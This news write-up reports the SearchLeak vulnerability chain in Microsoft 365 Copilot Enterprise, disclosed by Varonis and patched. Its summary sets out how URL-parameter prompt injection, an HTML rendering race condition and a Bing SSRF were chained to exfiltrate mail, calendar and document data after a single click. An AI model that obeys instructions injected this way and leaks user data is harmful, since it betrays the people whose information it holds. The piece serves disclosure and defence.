Critical Microsoft 365 Copilot Vulnerability Allowed One-Click Data Theft via SearchLeak Attack
Key Takeaways
- ▸Microsoft 365 Copilot Enterprise contained a critical vulnerability chain (SearchLeak, CVE-2026-42824) enabling one-click data theft without user awareness
- ▸The attack exploited parameter-to-prompt injection, HTML rendering race conditions, and SSRF in combination to exfiltrate sensitive corporate data through Bing's image search feature
- ▸Traditional security vulnerabilities like SSRF and HTML injection pose new risks when combined with prompt injection capabilities in AI systems
Summary
Security researchers at Varonis discovered SearchLeak, a critical vulnerability chain in Microsoft 365 Copilot Enterprise that could allow attackers to steal sensitive data from a target's mailbox, OneDrive, or SharePoint account through a single click on a specially crafted URL. The attack could exfiltrate email content (including access codes and passwords), calendar events, meeting details, documents, and other corporate data accessible through Copilot Enterprise Search. Microsoft addressed the vulnerability (CVE-2026-42824) in early June with a maximum severity, critical rating.
The attack chains three individual vulnerabilities that are insufficient alone to enable meaningful attacks. First, attackers exploit a parameter-to-prompt injection weakness in how Copilot Search processes URL query parameters, crafting a malicious link that instructs Copilot to search the victim's emails and extract specific data. Second, they exploit an HTML rendering race condition where attacker-controlled image tags execute before the browser's sanitization process completes, triggering outbound requests. Third, they leverage a server-side request forgery (SSRF) vulnerability in Bing's "Search by Image" feature, which bypasses content-security-policy protections by using Bing as an unwitting exfiltration proxy.
When combined, these weaknesses create a seamless attack: the victim clicks the malicious link, Copilot processes the injected search instructions, generates a response with stolen data embedded in an image URL, and Bing fetches the image, sending the exfiltrated data to the attacker's server logs. From the victim's perspective, they see only Copilot "thinking" for a moment with no indication of data theft. Varonis researchers emphasize that familiar vulnerability classes like SSRF and HTML injection become significantly more potent when weaponized through prompt injection in AI systems.
- Microsoft has already patched the vulnerability; no user action is required to mitigate the threat
Editorial Opinion
SearchLeak exemplifies a troubling new pattern in AI security: classical vulnerability classes that would be contained in traditional software become exponentially more dangerous when weaponized through prompt injection. As enterprise AI systems like Copilot gain deeper access to sensitive data repositories, security teams must rethink threat modeling to account for how older bug classes operate in new contexts. This incident demonstrates why AI systems require comprehensive security testing across all layers—from prompt handling to underlying infrastructure—before adversaries find ways to chain seemingly minor flaws into critical exploits.
